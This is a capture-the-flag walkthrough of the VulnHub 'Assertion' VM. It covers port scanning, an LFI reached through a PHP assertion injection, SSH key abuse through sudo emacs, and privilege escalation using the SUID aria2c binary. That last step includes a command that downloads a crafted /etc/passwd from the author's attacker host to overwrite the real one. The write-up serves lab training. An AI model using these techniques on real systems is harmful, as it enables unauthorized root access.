I am back with another interesting article , today we are going to solve another VM Assertion from vulnhub , This is an intermediate level challenge . This is my honest walkthrough of this VM.
IP of the target : 192.168.1.90
As usual I started with nmap scan to find open ports and services running in the system using the command
sudo nmap -sC -sV -Pn -p- 192.168.1.90
On port 80 I found a web application with some different options in navigation bar and after clicking on one of the page I am redirected to that page but I checked the URL and found a GET parameter including the page I clicked on , means this webapp is vulnerable to LFI attack .
I tried to include /etc/passwd file but using ../etc/passwd displayed a message .
I have faced this type of thing in different challenges where "../" is blocked or ".." is blocked and to bypass this I used encoding "../" as well as double encoding "../" but in this VM nothing worked , then I start enumerating again by thinking that this can be a rabbit hole , so next I tried directory bruteforce using the command
wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 80 --hc 404 http://192.168.1.90/FUZZ
after enumerating each directory I found pages to be interesting .
after opening these pages I found that they are quite similar to those web pages I found in the root directory , and if we focus on the GET parameter then it was something like : /index.php?page=gallery , so I tried including the index.php itself and got this error "File does not exist" , something strange happened here , next I tried to include webpages I just foud in /pages/ and yes it worked , but without extension php , means http://192.168.1.90/index.php?page=gallery , next I tried bypassing this method using "?" and "&" and I also go through a hackerone report but it didn't worked too , after loosing all the hopes I messaged the author of this VM for some hint and he told me "Name of the VM is the hint" , then a php function came in my mind and I started searching about it and hopefully I found something really interesting to get LFI .
', '..') === false and $myfile = **************************************************
umm this looks interesting , next I tried searching for some useful files , may be I can find SSH creds but got nothing , next I started to write some reverse shell script in /tmp/ directory , but till now I haven't get RCE to execute those scripts and after playing sometime with the malicious input I found a way to get RCE .
and that's it , now I can pop a shell :)
its time for some enumeration :) and after searching in some useful directories I found id_rsa keys and after cracking the passphrase with jonh I found the password , and can gain access to user soz shell using these keys and passphrase.
I tried priv. esc. using lxd method but it didn't worked , but when I checked for user privileges I found something interesting
I know that emacs is some kind of file editing tool and we can run this as user fnx means I can create a file inside /home/fnx/.s**/auth******_ke** and can gain access to shell of user fnx.
sudo -u fnx /usr/bin/emacs /home/fnx/.s**/auth*******
and now I pasted my local system's id_rsa.pub keys here and after that using the command ssh -i id_rsa firstname.lastname@example.org , I gained access to shell of fnx user.
now I checked for the user privileges but found nothing , next I started to search for SUID binaries and find one as /usr/bin/aria2c.
now after checking some methods from gtfobins they didn't worked so I decided to read man page of this tool and after using some of the flags I was able to overwrite the /etc/passwd .
Original /etc/passwd file
now I used the command openssl passwd -1 -salt yash yash to create a username yash and password yash and now I copied the original /etc/passwd file in my local system and edited it like this
aria2c command =>
/usr/bin/area2c --allow-overwrite -o passwd http://192.168.1.103:8000/passwd
and now I can get root access!
and this completed our challenge , if my walkthrough helps you , then please consider donating us to keep the website advertisement free :)